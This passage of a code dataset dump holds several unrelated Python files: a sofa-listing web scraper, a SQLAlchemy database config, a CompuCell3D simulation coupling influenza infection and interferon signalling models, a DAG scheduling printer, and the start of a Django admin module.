listings)\n\ndef pagination_loop(client): # returns all pages of individual sofa listings\n url = \"https://www.castlery.com/sg/sofas/all-sofas?p=1\"\n page_num = 1\n page = get_page(client, url, page_num)\n links = parse_listings(page.body_html)\n while page.next_page != \"None\":\n print(\"current page: \", page_num)\n page = get_page(client,page.next_page, page_num)\n links |= parse_listings(page.body_html) # union the links\n print(\"links: \", len(links))\n page_num += 1\n return links\n\ndef main():\n client = httpx.Client()\n links = pagination_loop(client)\n print(links)\n\nif __name__ == \"__main__\":\n main()","repo_name":"yijiyap/projectscrape","sub_path":"2-castlery/3-scraper.py","file_name":"3-scraper.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74294478470","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nimport os\n\n\nDB_HOSTNAME = os.environ[\"DB_HOSTNAME\"]\n\nSQLALCHEMY_DATABASE_URI = f\"postgresql://docker:docker@{DB_HOSTNAME}/dogbreed\"\n\nengine = create_engine(SQLALCHEMY_DATABASE_URI, pool_pre_ping=True)\n\nSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\nBase = declarative_base()\n\n\ndef get_db():\n try:\n db = SessionLocal()\n yield db\n finally:\n 
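The castlery scraper above derives page URLs by chopping the last character (url[:-1] + f"{n}"), which only holds while the page number is a single digit: starting from "?p=10", url[:-1] yields "?p=1" and the next fetch becomes "?p=110". A sketch using explicit query rewriting instead (stdlib urllib; the helper name is mine):

from urllib.parse import urlencode, urlparse, parse_qs, urlunparse

def with_page(url: str, n: int) -> str:
    # Rewrite the "p" query parameter instead of slicing the URL string.
    parts = urlparse(url)
    query = parse_qs(parts.query)
    query["p"] = [str(n)]
    return urlunparse(parts._replace(query=urlencode(query, doseq=True)))

assert with_page("https://example.com/sofas?p=1", 12).endswith("?p=12")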
db.close()\n","repo_name":"calanco/dogbreed","sub_path":"app/config/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22185829419","text":"from cc3d.core.PySteppables import *\nimport numpy as np\n\nplot_ODEModel = False\nplot_CellModel = True\nplot_PlaqueAssay = True\n\ncouple_Models = True\nhow_to_determine_V = 2 # Determines the V from the ODE model (1) or from field (2)\nhow_to_determine_IFNe = 2 # Determines the IFNe from the ODE model (1) or from field (2)\n\nmin_to_mcs = 10.0 # min/mcs\nhours_to_mcs = min_to_mcs / 60.0 # hours/mcs\ndays_to_mcs = min_to_mcs / 1440.0 # day/mcs\nhours_to_simulate = 50.0 # 10 in the original model\n\n'''Smith AP, Moquin DJ, Bernhauerova V, Smith AM. Influenza virus infection model with density dependence \nsupports biphasic viral decay. Frontiers in microbiology. 2018 Jul 10;9:1554.'''\n\nFluModel_string = ''' \n model FluModel()\n\n //State Variables and Transitions\n V1: -> T ; -beta * V * T ; // Susceptible Cells\n V2: -> I1 ; beta * V * T - k * I1 ; // Early Infected Cells\n V3: -> I2 ; k * I1 - delta_d * I2 / (K_delta + I2) ; // Late Infected Cells\n V4: -> V ; p * I2 - c * V ; // Extracellular Virus\n V5: -> D ; delta_d * I2 / (K_delta + I2) ; // Cleared Infected Cells (for Bookkeeping)\n\n //Parameters\n beta = 2.4* 10^(-4) ; // Virus Infective\n p = 1.6 ; // Virus Production\n c = 13.0 ; // Virus Clearance\n k = 4.0 ; // Eclipse phase\n delta_d = 1.6 * 10^6 ; // Infected Cell Clearance\n K_delta = 4.5 * 10^5 ; // Half Saturation Constant \n\n // Initial Conditions ;\n T0 = 1.0*10^7;\n T = T0 ; // Initial Number of Uninfected Cells\n I1 = 75.0 ; // Initial Number of Infected Cells\nend'''\n\n'''Jordan J. A. Weaver and Jason E. Shoemaker. 
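The get_db generator that closes above is the usual FastAPI-style per-request dependency: the framework advances it once to obtain the session, then resumes it at teardown so the finally block always closes the session. Driving the pattern by hand with a dummy session (a sketch, not the record's code):

class DummySession:
    def __init__(self):
        self.closed = False
    def close(self):
        self.closed = True

def get_db_like(factory):
    db = factory()
    try:
        yield db
    finally:
        db.close()          # runs on normal teardown and on GeneratorExit

gen = get_db_like(DummySession)
session = next(gen)         # what the framework hands to the endpoint
assert session.closed is False
gen.close()                 # request teardown -> finally -> close()
assert session.closed is True

The pool_pre_ping=True flag on the engine above complements this: SQLAlchemy tests each connection at checkout, so a stale connection is replaced rather than failing mid-request.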
Mathematical Modeling of RNA Virus Sensing Pathways Reveal Paracrine Signaling as the Primary Factor \nRegulating Excessive Cytokine Production'''\n\nIFNModel_string = '''\n //Equations\n E2a: -> IFN ; P*(k11*RIGI*V+k12*(V^n)/(k13+(V^n))+k14*IRF7P) ;\n E2b: IFN -> IFNe ; k21*IFN ;\n E3a: IFNe -> ; t2*IFNe ;\n E4a: -> STATP ; P*k31*IFNe/(k32+k33*IFNe) ;\n E4b: STATP -> ; t3*STATP ;\n E5a: -> IRF7 ; P*(k41*STATP+k42*IRF7P) ;\n E5b: IRF7 -> ; t4*IRF7 ;\n E6a: -> IRF7P ; P*k51*IRF7 ;\n E6b: IRF7P -> ; t5*IRF7P ;\n E7a: P -> ; P*k61*V ;\n E8a: -> V ; P*(k71*V)/(1.0+k72*IFNe*7E-5) ;\n E8b: V -> ; k73*V ;\n\n //Parameters\n k11 = 0.0 ; \n k12 = 9.746 ; \n k13 = 12.511 ; \n k14 = 13.562 ;\n k21 = 10.385 ;\n t2 = 3.481 ;\n k31 = 45.922 ;\n k32 = 5.464 ;\n k33 = 0.068 ;\n t3 = 0.3 ;\n k41 = 0.115 ;\n k42 = 1.053 ;\n t4 = 0.75 ;\n k51 = 0.202 ;\n t5 = 0.3 ;\n k61 = 0.635 ;\n k71 = 1.537 ;\n k72 = 47.883 ;\n k73 = 0.197 ;\n n = 3.0 ;\n\n //Initial Conditions\n P = 1.0 ;\n RIGI = 1.0 ;\n IRF7 = 0.0 ;\n V = 6.9e-8 ;\n'''\n\n# Viral Replication Model\nviral_model_string = '''\n E7a: P -> ; P*k61*V ;\n E8a: -> V ; P*k71*V/(1.0+k72*IFNe*7E-5) ;\n E8b: V -> ; k73*V ;\n\n //Parameters\n k61 = 0.635 ;\n k71 = 1.537 ;\n k72 = 47.883 ;\n k73 = 0.197 ;\n\n //Initial Conditions\n P = 1.0 ;\n V = 0.0 ; \n \n //Inputs\n IFNe = 0.0 ;\n'''\n\nIFN_model_string = '''\n //Equations\n E2a: -> IFN ; P*(k12*(V^n)/(k13+(V^n))+k14*IRF7P) ;\n E2b: IFN -> ; k21*IFN ;\n E4a: -> STATP ; P*k31*IFNe/(k32+k33*IFNe) ;\n E4b: STATP -> ; t3*STATP ;\n E5a: -> IRF7 ; P*(k41*STATP+k42*IRF7P) ;\n E5b: IRF7 -> ; t4*IRF7 ;\n E6a: -> IRF7P ; P*k51*IRF7 ;\n E6b: IRF7P -> ; t5*IRF7P ;\n\n //Parameters\n k12 = 9.746 ; \n k13 = 12.511 ; \n k14 = 13.562 ;\n k21 = 10.385 ; // CHANGED\n t2 = 3.481 ;\n k31 = 45.922 * 100.0 ; // CHANGED\n k32 = 5.464 ;\n k33 = 0.068 ;\n t3 = 0.3 ;\n k41 = 0.115 ;\n k42 = 1.053 ;\n t4 = 0.75 ;\n k51 = 0.202 ;\n t5 = 0.3 ;\n n = 3.0 ;\n\n // Inputs\n P = 0.0 ;\n V = 0.0 ;\n IFNe = 0.0 ;\n'''\n\nclass ODEModelSteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n self.shared_steppable_vars['InitialNumberCells'] = len(self.cell_list_by_type(self.U))\n\n self.get_xml_element('simulation_steps').cdata = hours_to_simulate / hours_to_mcs\n\n # Adding free floating antimony model\n self.add_free_floating_antimony(model_string=FluModel_string, model_name='FluModel',\n step_size=days_to_mcs)\n\n # Changing initial values according to discussions with Amber Smith\n # self.sbml.FluModel['I1'] = 0.0\n # self.sbml.FluModel['V'] = 75.0\n self.sbml.FluModel['I1'] = 1.0 / self.shared_steppable_vars['InitialNumberCells']\n self.sbml.FluModel['V'] = 0.0\n\n self.add_free_floating_antimony(model_string=IFNModel_string, model_name='IFNModel',\n step_size=hours_to_mcs)\n\n self.add_antimony_to_cell_types(model_string=viral_model_string, model_name='VModel',\n cell_types=[self.U], step_size=hours_to_mcs)\n\n self.add_antimony_to_cell_types(model_string=IFN_model_string, model_name='IModel',\n cell_types=[self.U], step_size=hours_to_mcs)\n\n # Initial conditions with infected cell in the center\n cell = self.cell_field[self.dim.x // 2, self.dim.y // 2, 0]\n cell.type = self.I1\n cell.sbml.VModel['V'] = 6.9e-8\n if not couple_Models:\n self.get_xml_element('IFNe_dc').cdata = 0.0\n for cell in self.cell_list_by_type(self.U,self.I1):\n cell.type = self.I2\n cell.sbml.VModel['V'] = 6.9e-8\n\n def step(self, mcs):\n self.timestep_sbml()\n\nclass 
CellularModelSteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n # set initial model parameters\n self.ExtracellularIFN = self.sbml.IFNModel['IFNe']\n self.get_xml_element('IFNe_decay').cdata = self.sbml.IFNModel['t2'] * hours_to_mcs\n self.ExtracellularVirus = self.sbml.FluModel['V']\n self.get_xml_element('virus_decay').cdata = self.sbml.FluModel['c'] * days_to_mcs\n\n def step(self, mcs):\n secretorV = self.get_field_secretor(\"Virus\")\n secretorIFN = self.get_field_secretor(\"IFNe\")\n\n ## U to I1 transition - Amber Model\n # V1: T -> U ; beta * V * T\n for cell in self.cell_list_by_type(self.U):\n # Determine V from scalar virus from the ODE\n if how_to_determine_V == 1:\n b = self.sbml.FluModel['beta'] * self.sbml.FluModel['T0'] * days_to_mcs\n V = self.sbml.FluModel['V'] / self.sbml.FluModel['T0']\n # Determine V from the virus field\n if how_to_determine_V == 2:\n b = self.sbml.FluModel['beta'] * self.shared_steppable_vars['InitialNumberCells'] * days_to_mcs\n V = secretorV.amountSeenByCell(cell)\n p_UtoI1 = b * V\n if np.random.random() < p_UtoI1:\n cell.type = self.I1\n cell.sbml.VModel['V'] = 6.9e-8\n\n ## I1 to I2 transition - Amber Model\n # V2: I1 -> I2 ; k * I1\n for cell in self.cell_list_by_type(self.I1):\n k = self.sbml.FluModel['k'] * days_to_mcs\n p_T1oI2 = k\n if np.random.random() < p_T1oI2:\n cell.type = self.I2\n\n ## P to D transition - Jordan Model\n # E7a: P -> ; P * k61 * V;\n for cell in self.cell_list_by_type(self.I2):\n k61 = cell.sbml.VModel['k61'] * hours_to_mcs\n V = cell.sbml.VModel['V']\n P = cell.sbml.VModel['P']\n p_I2toD = k61 * V * (1-P)\n if np.random.random() < p_I2toD:\n cell.type = self.DEAD\n\n ## Updating values of intracellular models\n for cell in self.cell_list:\n if couple_Models:\n cell.sbml.IModel['V'] = cell.sbml.VModel['V']\n cell.sbml.IModel['P'] = cell.sbml.VModel['P']\n IFNe = secretorIFN.amountSeenByCell(cell)\n cell.sbml.IModel['IFNe'] = IFNe\n cell.sbml.VModel['IFNe'] = IFNe\n if not couple_Models:\n if how_to_determine_IFNe == 2:\n cell.sbml.IModel['V'] = cell.sbml.VModel['V']\n cell.sbml.IModel['P'] = cell.sbml.VModel['P']\n IFNe = secretorIFN.amountSeenByCell(cell)\n cell.sbml.IModel['IFNe'] = IFNe\n cell.sbml.VModel['IFNe'] = IFNe\n if how_to_determine_IFNe == 1:\n ## Inputs to the INF model\n cell.sbml.IModel['V'] = self.sbml.IFNModel['V']\n cell.sbml.IModel['P'] = self.sbml.IFNModel['P']\n cell.sbml.IModel['IFNe'] = self.sbml.IFNModel['IFNe']\n ## Inputs to the Virus model\n cell.sbml.VModel['IFNe'] = self.sbml.IFNModel['IFNe']\n\n ## Production of extracellular IFN - Jordan Model\n # E2b: IFN -> IFNe; k21 * IFN ;\n I = self.ExtracellularIFN\n k21 = self.sbml.IFNModel['k21'] * hours_to_mcs\n for cell in self.cell_list_by_type(self.U,self.I1,self.I2):\n intracellularIFN = cell.sbml.IModel['IFN']\n p = k21 * intracellularIFN\n release = secretorIFN.secreteInsideCellTotalCount(cell, p / cell.volume)\n self.ExtracellularIFN += release.tot_amount\n # E3a: IFNe -> ; t2*IFNe ;\n t2 = self.sbml.IFNModel['t2'] * hours_to_mcs\n self.ExtracellularIFN -= t2 * I\n\n ## Measure amount of extracellular IFN field\n num_cells = len(self.cell_list_by_type(self.U, self.I1, self.I2, self.DEAD))\n num_living = len(self.cell_list_by_type(self.U, self.I1, self.I2))\n self.ExtracellularIFN_Field = self.get_field_secretor(\"IFNe\").totalFieldIntegral() / num_cells * num_living\n # self.ExtracellularIFN_Field *= (1 - t2)\n\n ## Production of extracellular virus - Jordan 
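The transitions above convert ODE rates into per-step probabilities with the linear rule p = rate * dt followed by a Bernoulli draw. An aside (mine, not from the record): for a constant hazard the exact per-step probability is 1 - exp(-rate * dt), and at this model's step sizes the two are nearly indistinguishable:

import numpy as np

rate, dt = 4.0, 10.0 / 1440.0          # e.g. k [1/day] and days per MCS
p_linear = rate * dt
p_exact = 1.0 - np.exp(-rate * dt)
assert abs(p_linear - p_exact) < 5e-4  # small-step regime: nearly identical

transition = np.random.random() < p_exact   # Bernoulli draw, as in the record

The linear form only drifts when rate * dt approaches 1, which is worth checking whenever min_to_mcs is made coarser.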
Model\n # E8b: V -> ; k73 * V\n V = self.ExtracellularVirus\n k73 = self.sbml.IFNModel['k73'] * hours_to_mcs\n for cell in self.cell_list_by_type(self.I2):\n Virus = cell.sbml.VModel['V']\n p = k73 * Virus * 1094460.28\n release = secretorV.secreteInsideCellTotalCount(cell, p / cell.volume)\n self.ExtracellularVirus += release.tot_amount\n c = self.sbml.FluModel['c'] * days_to_mcs\n self.ExtracellularVirus -= c * V\n\n ## Measure amount of extracellular virus field\n self.ExtracellularVirus_Field = 0\n for cell in self.cell_list_by_type(self.U,self.I1,self.I2):\n V = secretorV.amountSeenByCell(cell)\n self.ExtracellularVirus_Field += V\n\n # Dictonary to pass information between steppables\n self.shared_steppable_vars['ExtracellularIFN'] = self.ExtracellularIFN\n self.shared_steppable_vars['ExtracellularIFN_Field'] = self.ExtracellularIFN_Field\n self.shared_steppable_vars['ExtracellularVirus'] = self.ExtracellularVirus\n self.shared_steppable_vars['ExtracellularVirus_Field'] = self.ExtracellularVirus_Field\n\nclass IFNPlotSteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n self.initial_infected = len(self.cell_list_by_type(self.U))\n # Initialize Graphic Window for Jordan IFN model\n if (plot_ODEModel == True) or (plot_CellModel == True):\n self.plot_win1 = self.add_new_plot_window(title='V',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win2 = self.add_new_plot_window(title='H',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win3 = self.add_new_plot_window(title='P',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win4 = self.add_new_plot_window(title='IFNe',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win5 = self.add_new_plot_window(title='STATP',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win6 = self.add_new_plot_window(title='IRF7',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win7 = self.add_new_plot_window(title='IRF7P',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win8 = self.add_new_plot_window(title='INF',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n if plot_ODEModel:\n self.plot_win1.add_plot(\"ODEV\", style='Dots', color='yellow', size=5)\n self.plot_win2.add_plot(\"ODEH\", style='Dots', color='white', size=5)\n self.plot_win3.add_plot(\"ODEP\", style='Dots', color='red', size=5)\n self.plot_win4.add_plot(\"ODEIFNe\", style='Dots', color='orange', size=5)\n self.plot_win5.add_plot(\"ODESTATP\", style='Dots', color='blue', size=5)\n self.plot_win6.add_plot(\"ODEIRF7\", style='Dots', color='green', size=5)\n self.plot_win7.add_plot(\"ODEIRF7P\", style='Dots', color='purple', size=5)\n 
self.plot_win8.add_plot(\"ODEIFN\", style='Dots', color='magenta', size=5)\n\n if plot_CellModel:\n self.plot_win1.add_plot(\"CC3DV\", style='Lines', color='yellow', size=5)\n self.plot_win2.add_plot(\"CC3DH\", style='Lines', color='white', size=5)\n self.plot_win3.add_plot(\"CC3DP\", style='Lines', color='red', size=5)\n self.plot_win4.add_plot(\"CC3DIFNe\", style='Lines', color='orange', size=5)\n self.plot_win4.add_plot(\"CC3DIFNe2\", style='Lines', color='yellow', size=5)\n self.plot_win5.add_plot(\"CC3DSTATP\", style='Lines', color='blue', size=5)\n self.plot_win6.add_plot(\"CC3DIRF7\", style='Lines', color='green', size=5)\n self.plot_win7.add_plot(\"CC3DIRF7P\", style='Lines', color='purple', size=5)\n self.plot_win8.add_plot(\"CC3DIFN\", style='Lines', color='magenta', size=5)\n\n def step(self, mcs):\n if plot_ODEModel:\n L = len(self.cell_list_by_type(self.U,self.I1,self.I2))\n self.plot_win1.add_data_point(\"ODEV\", mcs * hours_to_mcs, self.sbml.IFNModel['V'])\n self.plot_win2.add_data_point(\"ODEH\", mcs * hours_to_mcs, self.sbml.IFNModel['P'])\n self.plot_win3.add_data_point(\"ODEP\", mcs * hours_to_mcs, self.sbml.IFNModel['P'])\n self.plot_win4.add_data_point(\"ODEIFNe\", mcs * hours_to_mcs, self.sbml.IFNModel['IFNe']*L)\n self.plot_win5.add_data_point(\"ODESTATP\", mcs * hours_to_mcs, self.sbml.IFNModel['STATP'])\n self.plot_win6.add_data_point(\"ODEIRF7\", mcs * hours_to_mcs, self.sbml.IFNModel['IRF7'])\n self.plot_win7.add_data_point(\"ODEIRF7P\", mcs * hours_to_mcs, self.sbml.IFNModel['IRF7P'])\n self.plot_win8.add_data_point(\"ODEIFN\", mcs * hours_to_mcs, self.sbml.IFNModel['IFN'])\n\n if plot_CellModel:\n L = len(self.cell_list_by_type(self.U,self.I1,self.I2))\n avgV = 0.0\n avgH = 0.0\n avgSTATP = 0.0\n avgIRF7 = 0.0\n avgIRF7P = 0.0\n avgIFN = 0.0\n\n for cell in self.cell_list_by_type(self.U,self.I1,self.I2):\n avgV += cell.sbml.VModel['V'] / L\n avgH += cell.sbml.VModel['P'] / L\n avgSTATP += cell.sbml.IModel['STATP'] / L\n avgIRF7 += cell.sbml.IModel['IRF7'] / L\n avgIRF7P += cell.sbml.IModel['IRF7P'] / L\n avgIFN += cell.sbml.IModel['IFN'] / L\n\n self.plot_win1.add_data_point(\"CC3DV\", mcs * hours_to_mcs, avgV)\n self.plot_win2.add_data_point(\"CC3DH\", mcs * hours_to_mcs, avgH)\n self.plot_win3.add_data_point(\"CC3DP\", mcs * hours_to_mcs,\n L / self.shared_steppable_vars['InitialNumberCells'])\n self.plot_win4.add_data_point(\"CC3DIFNe\", mcs * hours_to_mcs,\n self.shared_steppable_vars['ExtracellularIFN'])\n self.plot_win4.add_data_point(\"CC3DIFNe2\", mcs * hours_to_mcs,\n self.shared_steppable_vars['ExtracellularIFN_Field'])\n self.plot_win5.add_data_point(\"CC3DSTATP\", mcs * hours_to_mcs, avgSTATP)\n self.plot_win6.add_data_point(\"CC3DIRF7\", mcs * hours_to_mcs, avgIRF7)\n self.plot_win7.add_data_point(\"CC3DIRF7P\", mcs * hours_to_mcs, avgIRF7P)\n self.plot_win8.add_data_point(\"CC3DIFN\", mcs * hours_to_mcs, avgIFN)\n\nclass FluPlotSteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n if couple_Models:\n self.initial_uninfected = len(self.cell_list_by_type(self.U))\n if (plot_ODEModel == True) or (plot_CellModel == True):\n self.plot_win9 = self.add_new_plot_window(title='Flu Model Cells',\n x_axis_title='Hours',\n y_axis_title='Variables', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win10 = self.add_new_plot_window(title='Flu Model Virus',\n x_axis_title='Hours',\n y_axis_title='Virus', x_scale_type='linear',\n 
y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n if plot_ODEModel == True:\n self.plot_win9.add_plot(\"ODET\", style='Dots', color='blue', size=5)\n self.plot_win9.add_plot(\"ODEI1\", style='Dots', color='orange', size=5)\n self.plot_win9.add_plot(\"ODEI2\", style='Dots', color='red', size=5)\n self.plot_win9.add_plot(\"ODED\", style='Dots', color='purple', size=5)\n self.plot_win10.add_plot(\"ODEV\", style='Dots', color='blue', size=5)\n\n if plot_CellModel == True:\n self.plot_win9.add_plot(\"CC3DT\", style='Lines', color='blue', size=5)\n self.plot_win9.add_plot(\"CC3DI1\", style='Lines', color='orange', size=5)\n self.plot_win9.add_plot(\"CC3DI2\", style='Lines', color='red', size=5)\n self.plot_win9.add_plot(\"CC3DD\", style='Lines', color='purple', size=5)\n self.plot_win10.add_plot(\"CC3DV\", style='Lines', color='blue', size=5)\n\n def step(self, mcs):\n if couple_Models:\n if (plot_ODEModel == True) or (plot_CellModel == True):\n if plot_ODEModel == True:\n self.plot_win9.add_data_point(\"ODET\", mcs * days_to_mcs * 24.0,\n self.sbml.FluModel['T'] / self.sbml.FluModel['T0'])\n self.plot_win9.add_data_point(\"ODEI1\", mcs * days_to_mcs * 24.0,\n self.sbml.FluModel['I1'] / self.sbml.FluModel['T0'])\n self.plot_win9.add_data_point(\"ODEI2\", mcs * days_to_mcs * 24.0,\n self.sbml.FluModel['I2'] / self.sbml.FluModel['T0'])\n self.plot_win9.add_data_point(\"ODED\", mcs * days_to_mcs * 24.0,\n self.sbml.FluModel['D'] / self.sbml.FluModel['T0'])\n self.plot_win10.add_data_point(\"ODEV\", mcs * days_to_mcs * 24.0,\n np.log10(self.sbml.FluModel['V']))\n\n if plot_CellModel == True:\n self.plot_win9.add_data_point(\"CC3DT\", mcs * days_to_mcs * 24.0,\n len(self.cell_list_by_type(self.U)) / self.initial_uninfected)\n self.plot_win9.add_data_point(\"CC3DI1\", mcs * days_to_mcs * 24.0,\n len(self.cell_list_by_type(self.I1)) / self.initial_uninfected)\n self.plot_win9.add_data_point(\"CC3DI2\", mcs * days_to_mcs * 24.0,\n len(self.cell_list_by_type(self.I2)) / self.initial_uninfected)\n self.plot_win9.add_data_point(\"CC3DD\", mcs * days_to_mcs * 24.0,\n len(self.cell_list_by_type(self.DEAD)) / self.initial_uninfected)\n self.plot_win10.add_data_point(\"CC3DV\", mcs * days_to_mcs * 24.0,\n np.log10(self.shared_steppable_vars['ExtracellularVirus_Field']))\n\nclass PlaqueAssaySteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n if plot_PlaqueAssay == True:\n self.plot_win11 = self.add_new_plot_window(title='Plaque Growth',\n x_axis_title='Hours',\n y_axis_title='Avg Radial Distance', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n self.plot_win11.add_plot(\"rdI1\", style='Lines', color='orange', size=5)\n self.plot_win11.add_plot(\"rdI2\", style='Lines', color='red', size=5)\n self.plot_win11.add_plot(\"rdD\", style='Lines', color='purple', size=5)\n\n self.plot_win12 = self.add_new_plot_window(title='Effective Infectivity',\n x_axis_title='Hours',\n y_axis_title='Effective Infectivity', x_scale_type='linear',\n y_scale_type='log',\n grid=False, config_options={'legend': True})\n self.plot_win12.add_plot(\"ODEB\", style='Dots', color='blue', size=5)\n self.plot_win12.add_plot(\"CC3DBeff\", style='Lines', color='blue', size=5)\n self.previousT = 0.0\n\n def step(self, mcs):\n if plot_PlaqueAssay == True:\n avgI1rd = 0.0\n num_I1 = len(self.cell_list_by_type(self.I1))\n for cell in self.cell_list_by_type(self.I1):\n xCOM = cell.xCOM\n yCOM = 
cell.yCOM\n avgI1rd += sqrt((self.dim.x/2.0 - xCOM)**2 + (self.dim.y/2.0-yCOM)**2) / num_I1\n\n avgI2rd = 0.0\n num_I2 = len(self.cell_list_by_type(self.I2))\n for cell in self.cell_list_by_type(self.I2):\n xCOM = cell.xCOM\n yCOM = cell.yCOM\n avgI2rd += sqrt((self.dim.x/2.0 - xCOM)**2 + (self.dim.y/2.0-yCOM)**2) / num_I2\n\n avgDrd = 0.0\n num_D = len(self.cell_list_by_type(self.DEAD))\n for cell in self.cell_list_by_type(self.DEAD):\n xCOM = cell.xCOM\n yCOM = cell.yCOM\n avgDrd += sqrt((self.dim.x/2.0 - xCOM)**2 + (self.dim.y/2.0-yCOM)**2) / num_D\n\n self.plot_win11.add_data_point(\"rdI1\", mcs * hours_to_mcs, avgI1rd)\n self.plot_win11.add_data_point(\"rdI2\", mcs * hours_to_mcs, avgI2rd)\n self.plot_win11.add_data_point(\"rdD\", mcs * hours_to_mcs, avgDrd)\n\n Beff = 0.0\n num_T = len(self.cell_list_by_type(self.U))\n dT = abs(num_T - self.previousT)\n self.previousT = num_T\n if self.shared_steppable_vars['ExtracellularVirus_Field']:\n Beff = dT / (num_T*self.shared_steppable_vars['ExtracellularVirus_Field']*hours_to_mcs)\n\n self.plot_win12.add_data_point(\"ODEB\", mcs * hours_to_mcs,self.sbml.FluModel['beta'])\n self.plot_win12.add_data_point(\"CC3DBeff\", mcs * hours_to_mcs, Beff)","repo_name":"joaponte/CellularizedModels","sub_path":"JordanAmberModel/Simulation/JordanAmberModelSteppables.py","file_name":"JordanAmberModelSteppables.py","file_ext":"py","file_size_in_byte":28144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71314251593","text":"\"\"\"\nPrint the scheduling result for the appointed DAG.\n Author: Hailiang Zhao (hliangzhao@zju.edu.cn)\n\"\"\"\nimport pprint\nfrom collections import namedtuple\nfrom embedding.scenario import para\n\n\nEvent = namedtuple('Event', 'start end')\n\n\ndef print_scheduling_results(T_optimal_all, DAGs_deploy, process_sequence_all, start_time_all, DAG_num):\n \"\"\"\n Print the scheduling results of the given DAG.\n \"\"\"\n DAG_deploy = DAGs_deploy[DAG_num]\n T_optimal = T_optimal_all[DAG_num]\n process_sequence = process_sequence_all[DAG_num]\n start_time = start_time_all[DAG_num]\n\n schedules = [[] for _ in range(para.get_server_num())]\n for func in process_sequence:\n chosen_server = int(DAG_deploy[func - 1])\n pair = {'func=' + str(func): Event(start=start_time[func - 1], end=T_optimal[func - 1][chosen_server])}\n schedules[chosen_server].append(pair)\n schedules_dict = {}\n for n in range(para.get_server_num()):\n schedules_dict['server ' + str(n + 1)] = schedules[n]\n print('\\nThe finish time of each function on the chosen server for DAG #%d:' % DAG_num)\n pprint.pprint(schedules_dict)\n","repo_name":"hliangzhao/embedding","sub_path":"embedding/algos/interpretate_result.py","file_name":"interpretate_result.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"27"} +{"seq_id":"7826047307","text":"import django.db.models\nfrom django.contrib import admin\nfrom app import models\n\n\n@admin.register(models.Sniffer)\nclass SnifferAdmin(admin.ModelAdmin):\n\tfields = ('location', 'serial_code', ('owner',))\n\tlist_display = ('serial_code', 'location')\n\tlist_display_links = ('serial_code',)\n\n\n@admin.register(models.BeaconDevice)\nclass BeaconAdmin(admin.ModelAdmin):\n\tfields = ('mac_addr', 'owner')\n\tlist_display = ('mac_addr', 'owner')\n\tlist_display_links = ('mac_addr',)\n\tsearch_fields = ['owner__email', 'mac_addr']\n\n\n@admin.register(models.TrackingEvent)\nclass 
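The radial-distance loops in PlaqueAssaySteppable above divide by num_I1, num_I2 and num_D before checking whether any cells of those types exist, so an empty type raises ZeroDivisionError (they also rely on sqrt arriving via the star import). A guarded helper, with a namedtuple standing in for a CC3D cell (names are mine):

from math import sqrt
from collections import namedtuple

Cell = namedtuple("Cell", "xCOM yCOM")   # stand-in for a CC3D cell

def mean_radial_distance(cells, cx, cy):
    pts = [(c.xCOM, c.yCOM) for c in cells]
    if not pts:
        return 0.0                        # empty type: no ZeroDivisionError
    return sum(sqrt((cx - x) ** 2 + (cy - y) ** 2) for x, y in pts) / len(pts)

assert mean_radial_distance([], 50, 50) == 0.0
assert mean_radial_distance([Cell(53, 54)], 50, 50) == 5.0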
